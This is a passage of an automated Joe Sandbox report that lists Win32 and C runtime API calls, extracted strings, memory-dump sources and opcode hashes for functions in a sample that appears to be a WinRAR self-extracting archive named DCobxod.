                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004391E0,?,00000000,?,00000001,?,?,00000001,004391E0,?), ref: 0043C9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043CA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436CBE,?), ref: 0043CA70
                                                              • __freea.LIBCMT ref: 0043CA79
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: acce325d4b32ef68472ad23d0c9bcd8bac26bf27380434060c27194e5b50cab9
                                                              • Instruction ID: 1653167462d7997f3fd6d4bc594135a3ab52970c5c59c21e687cc6a265d605b8
                                                              • Opcode Fuzzy Hash: acce325d4b32ef68472ad23d0c9bcd8bac26bf27380434060c27194e5b50cab9
                                                              • Instruction Fuzzy Hash: 3E31D072A0021AABDF24DF65DC81EAF7BA5EB49710F04426AFC04E6250E739DD50CB94
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0042A691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: d8b53de92bb0f4b8b44b4cae2fed65d9ad0368da1ae2d5ac2e3c1bc452cc40dc
                                                              • Instruction ID: ee9b809c2b38b31f27f09b7259fa7fa83bb88921be775362ae42fa0c097a0fc1
                                                              • Opcode Fuzzy Hash: d8b53de92bb0f4b8b44b4cae2fed65d9ad0368da1ae2d5ac2e3c1bc452cc40dc
                                                              • Instruction Fuzzy Hash: ABE08C31942762A7C2205F60BC0DB8B3E14AB06B53F004121FA09A6195EF6486808BE8
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: .lnk$dB
                                                              • API String ID: 2691759472-1035013524
                                                              • Opcode ID: 986298ac30bfc19ee90b12e38fcfa2fc1f50412ab805c149ae403ab252eed3b7
                                                              • Instruction ID: 82791aa2cc25aabd4f707ebf6347b93cbfd740d13c2cfa205f94ff0dc836c188
                                                              • Opcode Fuzzy Hash: 986298ac30bfc19ee90b12e38fcfa2fc1f50412ab805c149ae403ab252eed3b7
                                                              • Instruction Fuzzy Hash: 4DA13E72E002399ADF24DBA0DD45EFB73FCAF44304F4485E7A509E3141EE789A858B69
                                                              APIs
                                                              • _free.LIBCMT ref: 0043B324
                                                                • Part of subcall function 00439097: IsProcessorFeaturePresent.KERNEL32(00000017,00439086,00000050,00443A34,?,0041D710,00000004,00451030,?,?,00439093,00000000,00000000,00000000,00000000,00000000), ref: 00439099
                                                                • Part of subcall function 00439097: GetCurrentProcess.KERNEL32(C0000417,00443A34,00000050,00451030), ref: 004390BB
                                                                • Part of subcall function 00439097: TerminateProcess.KERNEL32(00000000), ref: 004390C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction ID: 9243d94cc373f138efb00c256caaec28cf729623235328c84edcc871727b7197
                                                              • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction Fuzzy Hash: 9751C371E002199FDF14CFA9C881AAEB7B5EF4C314F2451AEE954E7340E7399E018B94
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004175E3
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 0041A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0041777F
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: b8d89e58a9e8b24ed3999e1ab3c6097e68a786ecaec233b8c8aa87a83dc7ea6c
                                                              • Instruction ID: fc538012f4ebe5e0518a8b4285b53734e728bdf22456af26a0973b8882451e00
                                                              • Opcode Fuzzy Hash: b8d89e58a9e8b24ed3999e1ab3c6097e68a786ecaec233b8c8aa87a83dc7ea6c
                                                              • Instruction Fuzzy Hash: 1841B071900118AAEB20EB61CC55EEEB37DAF41304F0040DBB609A2192DB785FC9CB78
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: 8a8cace6bc1c90515ae4a81a4bcaf2ddb462bac325b9c8a281f2928d7a247daa
                                                              • Instruction ID: 57ad4a4436ae089ca1ddfe77b1a8cb8a713a734b03f53afe686d058490450a1f
                                                              • Opcode Fuzzy Hash: 8a8cace6bc1c90515ae4a81a4bcaf2ddb462bac325b9c8a281f2928d7a247daa
                                                              • Instruction Fuzzy Hash: BC3114322043119A9B30AE558A026FB73E4DF94B14F15C11FFD8847283E76E8CC292EE
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 174bc937f5f7b48cbfc57a74af13c8e05c3d2a9b5c08f05d17ae4eff4facd865
                                                              • Instruction ID: 9c1bbcc49e8a618d219ca06a4ad567b47104ddb663fd8389e84b987863f263e3
                                                              • Opcode Fuzzy Hash: 174bc937f5f7b48cbfc57a74af13c8e05c3d2a9b5c08f05d17ae4eff4facd865
                                                              • Instruction Fuzzy Hash: 6021C572A043266AD731EA65E845B6BB3DCDF44758F84042FF640C7241EB6C9D8883EA
                                                              APIs
                                                                • Part of subcall function 0041F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0041F2E4
                                                                • Part of subcall function 0041F2C5: GetProcAddress.KERNEL32(004581C8,CryptUnprotectMemory), ref: 0041F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0041F33E), ref: 0041F3D2
                                                              Strings
                                                              • CryptUnprotectMemory failed, xrefs: 0041F3CA
                                                              • CryptProtectMemory failed, xrefs: 0041F389
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: b4d06e30917bb47d3e2b425e4f983a66d340c7e142276b61eb756f5242ac750c
                                                              • Instruction ID: 27c8c7a8f639d34e9d9625f77cf8840ab718ba3cdf3a732e56ad2a7f1a335764
                                                              • Opcode Fuzzy Hash: b4d06e30917bb47d3e2b425e4f983a66d340c7e142276b61eb756f5242ac750c
                                                              • Instruction Fuzzy Hash: E61124316016286BDB115F21D8016AE3714FF40B21B10416BFC116B292DF78DD86879D
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00421160,?,00000000,00000000), ref: 00421043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0042108A
                                                                • Part of subcall function 00416C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00416C54
                                                                • Part of subcall function 00416DCB: _wcschr.LIBVCRUNTIME ref: 00416E0A
                                                                • Part of subcall function 00416DCB: _wcschr.LIBVCRUNTIME ref: 00416E19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2706921342-3849766595
                                                              • Opcode ID: 6219a5ca331515c507194e64f8021582098ae3bcf9fbddd01068968b6d6a5fe7
                                                              • Instruction ID: a3469e8cce9f401d15b981b951b8f722741c7af6e65226fb65a206804a8b9ecf
                                                              • Opcode Fuzzy Hash: 6219a5ca331515c507194e64f8021582098ae3bcf9fbddd01068968b6d6a5fe7
                                                              • Instruction Fuzzy Hash: A60126B53003196BE3345F64BC41BB673A8EB50B52F20002FFA82526D1CEA8A884822C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: <9D$?*<>|"
                                                              • API String ID: 2691759472-961402769
                                                              • Opcode ID: 72f0190cef2851e0c2a990776a2c4d4e4cda4224931d0f9c34b005aca9e05e6a
                                                              • Instruction ID: a50818a120acf80c04d4180d056c4acb67fb8d4f874609fcacdb218ecc612173
                                                              • Opcode Fuzzy Hash: 72f0190cef2851e0c2a990776a2c4d4e4cda4224931d0f9c34b005aca9e05e6a
                                                              • Instruction Fuzzy Hash: 08F0D6675C5701C1D7305EA45C417B3B7E4DF99720F34081FE5C8873C2E6A988C0825E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: Software\WinRAR SFX$B
                                                              • API String ID: 176396367-577672339
                                                              • Opcode ID: 34992c754cd95bf6ef68b125793daa7d08c1d794698e119ce5af93bbc0232127
                                                              • Instruction ID: 5a3918145096710df5c2fe1b67596ebb00c88007a25032d913ec651dcca3a7bb
                                                              • Opcode Fuzzy Hash: 34992c754cd95bf6ef68b125793daa7d08c1d794698e119ce5af93bbc0232127
                                                              • Instruction Fuzzy Hash: AF018431900168BAEB219F91EC0AFDF7F7CEB05795F400067B50AE1061D7B49A98D7A5
                                                              APIs
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00421FE5
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00421FF6
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00422006
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00422014
                                                                • Part of subcall function 00421FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0041B371,?,?,00000000,?,?,?), ref: 0042202F
                                                                • Part of subcall function 0042AC04: SetCurrentDirectoryW.KERNELBASE(?,0042AE72,C:\Users\user\Desktop,00000000,0045946A,00000006), ref: 0042AC08
                                                              • _wcslen.LIBCMT ref: 0042AE8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryString
                                                              • String ID: <B$C:\Users\user\Desktop
                                                              • API String ID: 521417927-759115840
                                                              • Opcode ID: b1a2db0e530c313ec47285e72d194fc18726eef3a5ac00f5a9153ecb1219fe4b
                                                              • Instruction ID: b20332d00ccb1bfda5a0a7dc77e9a7a06b0c861b64836c958e0a7b6f98734fb9
                                                              • Opcode Fuzzy Hash: b1a2db0e530c313ec47285e72d194fc18726eef3a5ac00f5a9153ecb1219fe4b
                                                              • Instruction Fuzzy Hash: 36017971D4022856DF10ABA5ED07EDF73FCAF09705F40046BF905E3192E6BC9654CA99
                                                              APIs
                                                                • Part of subcall function 004397E5: GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                                • Part of subcall function 004397E5: _free.LIBCMT ref: 0043981C
                                                                • Part of subcall function 004397E5: SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                                • Part of subcall function 004397E5: _abort.LIBCMT ref: 00439863
                                                              • _abort.LIBCMT ref: 0043BB80
                                                              • _free.LIBCMT ref: 0043BBB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: pD
                                                              • API String ID: 289325740-1597287149
                                                              • Opcode ID: 970484987ffea0a3b55c78ba6c0c2a07ae4c00110337d46de2e898626b623c90
                                                              • Instruction ID: c9cc3a8332ca00e43b71868249b9b980f9b3ec96136e922c1af331d3a5720910
                                                              • Opcode Fuzzy Hash: 970484987ffea0a3b55c78ba6c0c2a07ae4c00110337d46de2e898626b623c90
                                                              • Instruction Fuzzy Hash: 05017C35D01622DBCA21AF5A940121AF760FB0CB24F14111FEA6467691CF6C7D018BCD
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (B$ZB
                                                              • API String ID: 2696272793-4289898920
                                                              • Opcode ID: caef7c39e3fa9752900b3beb1b59f59e2d578df34b1d920bf668e7207143b43d
                                                              • Instruction ID: b937d53cb01036936d70c8a62176c10914d6b7c8d701f90a752cb8a571e60aa5
                                                              • Opcode Fuzzy Hash: caef7c39e3fa9752900b3beb1b59f59e2d578df34b1d920bf668e7207143b43d
                                                              • Instruction Fuzzy Hash: 6C016D76600118FF9F059FB0DC49CEE7B6DFF043457000165B906D7120E731AA44EBA4
                                                              APIs
                                                                • Part of subcall function 0043BF30: GetEnvironmentStringsW.KERNEL32 ref: 0043BF39
                                                                • Part of subcall function 0043BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043BF5C
                                                                • Part of subcall function 0043BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043BF82
                                                                • Part of subcall function 0043BF30: _free.LIBCMT ref: 0043BF95
                                                                • Part of subcall function 0043BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043BFA4
                                                              • _free.LIBCMT ref: 004382AE
                                                              • _free.LIBCMT ref: 004382B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID: 0"G
                                                              • API String ID: 400815659-2485169809
                                                              • Opcode ID: 31233d6335da3d2a68e33e4f1f0c73d4bb1dadd9ec2b328e4195d6f6bb22a741
                                                              • Instruction ID: b2716260a3a4d3d8c145a88adad3d4f139b31e7d922ea7758a0257c6082fe6db
                                                              • Opcode Fuzzy Hash: 31233d6335da3d2a68e33e4f1f0c73d4bb1dadd9ec2b328e4195d6f6bb22a741
                                                              • Instruction Fuzzy Hash: 42E0E523605B42419261323B3C0276F46108B9D33CF25329FF624C61C3CE5C880304AF
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00421206,?), ref: 00420FEA
                                                              • GetLastError.KERNEL32(?), ref: 00420FF6
                                                                • Part of subcall function 00416C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00416C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00420FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 704461c3f4b97e885e4f63329fcad2f406670b6489c1b353225bfc6612b2012a
                                                              • Instruction ID: c1f18584ac6325994d4bb1a4683e9332b22773a7ed27945bebb4e916807a6e40
                                                              • Opcode Fuzzy Hash: 704461c3f4b97e885e4f63329fcad2f406670b6489c1b353225bfc6612b2012a
